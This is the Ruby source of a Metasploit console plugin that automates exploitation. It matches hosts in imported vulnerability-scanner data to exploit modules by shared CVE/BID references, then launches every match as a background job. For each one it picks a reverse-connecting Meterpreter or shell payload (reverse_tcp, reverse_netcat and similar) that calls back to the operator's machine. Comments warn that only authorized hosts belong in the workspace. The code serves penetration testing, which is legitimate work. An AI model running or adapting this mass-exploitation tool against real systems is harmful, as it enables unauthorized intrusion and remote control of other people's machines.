1 # Copyright (c) 2012, Carlos Perez <carlos_perez[at]darkoperator.com
2 # All rights reserved.
3 #
4 # Redistribution and use in source and binary forms, with or without modification, are permitted
5 # provided that the following conditions are met:
6 #
7 # Redistributions of source code must retain the above copyright notice, this list of conditions and
8 # the following disclaimer.
9 #
10 # Redistributions in binary form must reproduce the above copyright notice, this list of conditions
11 # and the following disclaimer in the documentation and/or other materials provided with the
12 # distribution.
13 #
14 # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
15 # IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
16 # FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
17 # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
18 # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
19 # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
20 # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
21 # OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
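require 'set'
require 'timeout'

module Msf

  # Console plugin that automates exploitation from imported vulnerability-
  # scanner data.  Every host in the current workspace whose vulns carry
  # CVE/BID/OSVDB-style references is matched against the remote exploit
  # modules that list the same references; the matches are then launched as
  # background jobs with the best compatible payload.
  #
  # Operational caveat: the workspace IS the target scope.  Anything in it
  # with matching vulns will be exploited unless excluded with -f, so make
  # sure the workspace only holds authorized hosts before running
  # vuln_exploit, and keep the default minimum rank (good) unless you accept
  # the risk of low-ranked exploits crashing services.
  class Plugin::AutoExploit < Msf::Plugin

    # Command dispatcher providing the +vuln_exploit+ console command.
    class AutoExploit
      include Msf::Ui::Console::CommandDispatcher

      # Rank names accepted by -r, mapped to the numeric values of the
      # framework's Msf::*Ranking constants (Low=100 ... Excellent=600).
      # "excelent" is kept as an alias because the original help text used it.
      RANKS = {
        "low"       => 100,
        "average"   => 200,
        "normal"    => 300,
        "good"      => 400,
        "great"     => 500,
        "excellent" => 600,
        "excelent"  => 600
      }.freeze

      # The help text and the -r error message both promise "good" as the
      # default; the code used to start at 100 (low), which silently included
      # the flakiest exploits in an unattended run.
      DEFAULT_MIN_RANK = RANKS["good"]

      # Seconds allowed for a single exploit_simple call to return.  The
      # exploit itself runs as a job, so this only bounds the launch.
      EXPLOIT_TIMEOUT = 20

      # Preferred payloads, best first (taken from the exploit UI mixin).
      PREFERRED_PAYLOADS = [
        'windows/meterpreter/reverse_tcp',
        'java/meterpreter/reverse_tcp',
        'php/meterpreter/reverse_tcp',
        'php/meterpreter_reverse_tcp',
        'cmd/unix/interact',
        'cmd/unix/reverse',
        'cmd/unix/reverse_perl',
        'cmd/unix/reverse_netcat',
        'windows/meterpreter/reverse_nonx_tcp',
        'windows/meterpreter/reverse_ord_tcp',
        'windows/shell/reverse_tcp',
        'generic/shell_reverse_tcp'
      ].freeze

      # Name reported for this command dispatcher.
      def name
        "auto_exploit"
      end

      # Console commands provided by this dispatcher.
      def commands
        {
          "vuln_exploit" => "Runs exploits based on data imported from vuln scanners."
        }
      end

      # vuln_exploit [-f ranges] [-r rank] [-s] [-h]
      #
      # Matches every vulnerable host in the workspace against remote exploit
      # modules by shared references and launches the matches as jobs.
      #   -f  comma separated IPs/ranges that must never be exploited
      #   -r  minimum exploit rank (default: good)
      #   -s  do not skip targets that already have a session
      # Requires an active database connection; aborts (after reporting) when
      # the database is down or a -f range cannot be parsed, because a typo in
      # the exclusion list must never silently widen the target set.
      def cmd_vuln_exploit(*args)
        opts = Rex::Parser::Arguments.new(
          "-f" => [ true, "Provide a comma separated list of IP's and Ranges to skip when running exploits."],
          "-r" => [ true, "Minimum Rank for exploits (low, average, normal, good, great and excellent) good is the default."],
          "-s" => [ false, "Do not limit number of sessions to one per target."],
          "-h" => [ false, "Command Help"]
        )

        skip_ranges    = []
        min_rank       = DEFAULT_MIN_RANK
        limit_sessions = true

        opts.parse(args) do |opt, idx, val|
          case opt
          when "-f"
            # Repeated -f options accumulate instead of overwriting each other.
            skip_ranges.concat(val.to_s.delete(" ").split(","))
          when "-r"
            key = val.to_s.downcase
            if RANKS.include?(key)
              min_rank = RANKS[key]
            else
              print_error("Value of #{val} not in list using default of good.")
            end
          when "-s"
            limit_sessions = false
          when "-h"
            print_line(opts.usage)
            return
          end
        end

        # Everything below reads host/vuln data from the database.
        unless framework.db && framework.db.active
          print_error("Database not connected; import scanner data first.")
          return
        end

        filter = build_skip_filter(skip_ranges)
        return if filter.nil?

        print_status("Matching Exploits (This will take a while depending on number of hosts)...")
        candidates       = remote_exploit_candidates(min_rank)
        matched_exploits = match_exploits(candidates, filter)

        if matched_exploits.empty?
          print_error("No Exploits were Matched.")
          return
        end

        print_good("Matched Exploits:")
        matched_exploits.each do |m|
          print_good("\t#{m[:target]} #{m[:exploit]} #{m[:port]}")
        end

        run_exploits(matched_exploits, limit_sessions)
      end

      # Expand the -f ranges into a Set of IP strings.  Returns nil (after
      # reporting the offending range) when a range cannot be parsed; callers
      # must then abort rather than run with an incomplete exclusion list.
      def build_skip_filter(ranges)
        filter = Set.new
        ranges.each do |r|
          walker = Rex::Socket::RangeWalker.new(r)
          unless walker.valid?
            print_error("Invalid skip range: #{r}")
            return nil
          end
          walker.each { |ip| filter << ip }
        end
        filter
      end

      # Instantiate each exploit module once (the original did this once per
      # host) and keep only what matching needs: the fullname and the Set of
      # non-URL references.  Modules without an RPORT option (the proxy used
      # here for "remote exploit"), below +min_rank+, or without references
      # are dropped up front.  A module that fails to instantiate is reported
      # and skipped instead of aborting the run.
      def remote_exploit_candidates(min_rank)
        candidates = []
        framework.exploits.each_module do |refname, klass|
          begin
            mod = klass.new
          rescue ::StandardError => err
            print_error("Skipping #{refname}: #{err.class} #{err.message}")
            next
          end
          next unless mod.datastore.include?('RPORT')
          next unless mod.rank >= min_rank
          refs = parse_references(mod.references)
          next if refs.empty?
          candidates << { :fullname => mod.fullname, :refs => refs.to_set }
        end
        candidates
      end

      # Match +candidates+ against the vulns of every workspace host.
      # Hosts in +filter+ or without vulns are skipped; vulns without a
      # service are skipped because there is no port to use as RPORT.  At most
      # one entry per (host, exploit) is recorded, taking the port of the
      # first vuln whose references overlap the exploit's.  When the host OS
      # is not recognized the exploit platform is not restricted (same as the
      # original, which matched an empty regex).
      def match_exploits(candidates, filter)
        matched = []
        framework.db.workspace.hosts.each do |host|
          address = host.address.to_s
          next if filter.include?(address)

          vulns = host.vulns.to_a
          next if vulns.empty?

          os_type = normalise_os(host.os_name)
          os_re   = os_type ? /#{Regexp.escape(os_type)}/ : nil

          # Preload each usable vuln's reference names once per host.
          vuln_refs = []
          vulns.each do |v|
            next if v.service.nil?
            vuln_refs << [v, v.refs.map { |r| r.name }.to_set]
          end
          next if vuln_refs.empty?

          candidates.each do |cand|
            next if os_re && cand[:fullname] !~ os_re
            hit = vuln_refs.find { |_v, names| cand[:refs].any? { |r| names.include?(r) } }
            next if hit.nil?
            matched << {
              :exploit => cand[:fullname],
              :port    => hit[0].service.port,
              :target  => address
            }
          end
        end
        matched
      end

      # Launch each matched exploit as a job with the preferred compatible
      # payload.  A per-exploit problem (module will not load, no compatible
      # payload, option validation failure, timeout, exception from the
      # module) is reported and the run continues; the original only caught
      # Timeout::Error, so any other failure aborted the whole batch.
      def run_exploits(matched_exploits, limit_sessions)
        # One listener port for the whole run, as before.  NOTE(review): every
        # reverse-connect job binds this same LPORT; if concurrent handlers on
        # one port fail to start, switch to a per-exploit port.
        lport = rand(1024..65000)

        print_status("Running Exploits:")
        matched_exploits.each do |m|
          target = m[:target]
          if limit_sessions && get_current_sessions.include?(target)
            print_good("\tSkipping #{target} #{m[:exploit]} because a session already exists.")
            next
          end

          begin
            ex = framework.modules.create(m[:exploit])
            if ex.nil?
              print_error("Could not load #{m[:exploit]}")
              next
            end
            if chose_pay(ex, target).nil?
              print_error("No compatible payload for #{m[:exploit]} against #{target}")
              next
            end
            ex.datastore['RHOST']   = target
            ex.datastore['RPORT']   = m[:port].to_i
            ex.datastore['LPORT']   = lport
            ex.datastore['VERBOSE'] = true
            # Raises Msf::OptionValidateError when a required option is unset.
            ex.options.validate(ex.datastore)
            print_status("Running #{m[:exploit]} against #{target}")
            Timeout.timeout(EXPLOIT_TIMEOUT) do
              ex.exploit_simple(
                'Payload'     => ex.datastore['PAYLOAD'],
                'LocalInput'  => driver.input,
                'LocalOutput' => driver.output,
                'RunAsJob'    => true
              )
            end
          rescue ::Timeout::Error
            print_error("Exploit #{m[:exploit]} against #{target} timed out")
          rescue ::StandardError => err
            print_error("Exploit #{m[:exploit]} against #{target} failed: #{err.class} #{err.message}")
          end
        end
      end

      # Normalize a scanner-reported OS name into the platform directory name
      # used in exploit fullnames.  Returns nil when the name is not
      # recognized (nil, or any unlisted string).  The solaris branch used to
      # assign a bare identifier and raised NameError for every Solaris host.
      def normalise_os(os_name)
        case os_name.to_s
        when /(Microsoft|Windows)/i          then "windows"
        when /(Linux|Ubuntu|CentOS|RedHat)/i then "linux"
        when /aix/i                          then "aix"
        when /(freebsd)/i                    then "freebsd"
        when /(hpux|hp-ux)/i                 then "hpux"
        when /solaris/i                      then "solaris"
        when /(Apple|OSX|OS X)/i             then "osx"
        end
      end

      # Turn a module's references into "CTX-VALUE" strings (e.g. "CVE-2008-4250"),
      # the form imported from Nessus, dropping URL references which cannot be
      # matched reliably.
      def parse_references(refs)
        Array(refs).reject { |r| r.ctx_id == "URL" }.map { |r| "#{r.ctx_id}-#{r.ctx_val}" }
      end

      # Select the first preferred payload compatible with +mod+, set PAYLOAD
      # and LHOST (the local address that routes to +rhost+) in its datastore
      # and return +mod+.  Returns nil when nothing is compatible; the
      # original fell off the end of its loop and returned the preference
      # Array, which the caller then used as an exploit module.
      def chose_pay(mod, rhost)
        compatible = mod.compatible_payloads.map { |pair| pair[0] }
        chosen = PREFERRED_PAYLOADS.find { |n| compatible.include?(n) }
        return nil if chosen.nil?
        mod.datastore['PAYLOAD'] = chosen
        mod.datastore['LHOST']   = Rex::Socket.source_address(rhost)
        mod
      end

      # Create a payload module instance with LHOST/LPORT set plus any extra
      # "OPT=val,OPT2=val" options.  Not used by vuln_exploit itself.  Returns
      # nil (after reporting) when the payload name is unknown; option
      # validation raises Msf::OptionValidateError on failure.
      def create_payload(name, lhost, lport, opts = "")
        pay = framework.payloads.create(name)
        if pay.nil?
          print_error("Could not create payload #{name}")
          return nil
        end
        pay.datastore['LHOST'] = lhost
        pay.datastore['LPORT'] = lport
        opts.to_s.split(",").each do |o|
          key, val = o.split("=", 2)
          next if key.nil? || key.empty?
          pay.datastore[key] = val
        end
        pay.options.validate(pay.datastore)
        print_good("Payload option validation passed")
        pay
      end

      # Peer addresses (without port) of all current sessions.  The tunnel
      # peer is split on its last colon so IPv6 peers are handled too;
      # sessions without a tunnel_peer are ignored instead of raising.
      def get_current_sessions
        framework.sessions.map do |_id, sess|
          peer = sess.tunnel_peer.to_s
          next if peer.empty?
          peer.include?(":") ? peer.rpartition(":").first : peer
        end.compact
      end

    end

    # Register the dispatcher when the plugin is loaded.
    def initialize(framework, opts)
      super
      add_console_dispatcher(AutoExploit)
      print_status("auto_exploit plugin loaded.")
    end

    # Unregister the dispatcher when the plugin is unloaded.
    def cleanup
      remove_console_dispatcher("auto_exploit")
    end

    def name
      "auto_exploit"
    end

    def desc
      "Allows for automation of running exploit modules based on information in the Database."
    end

  end
end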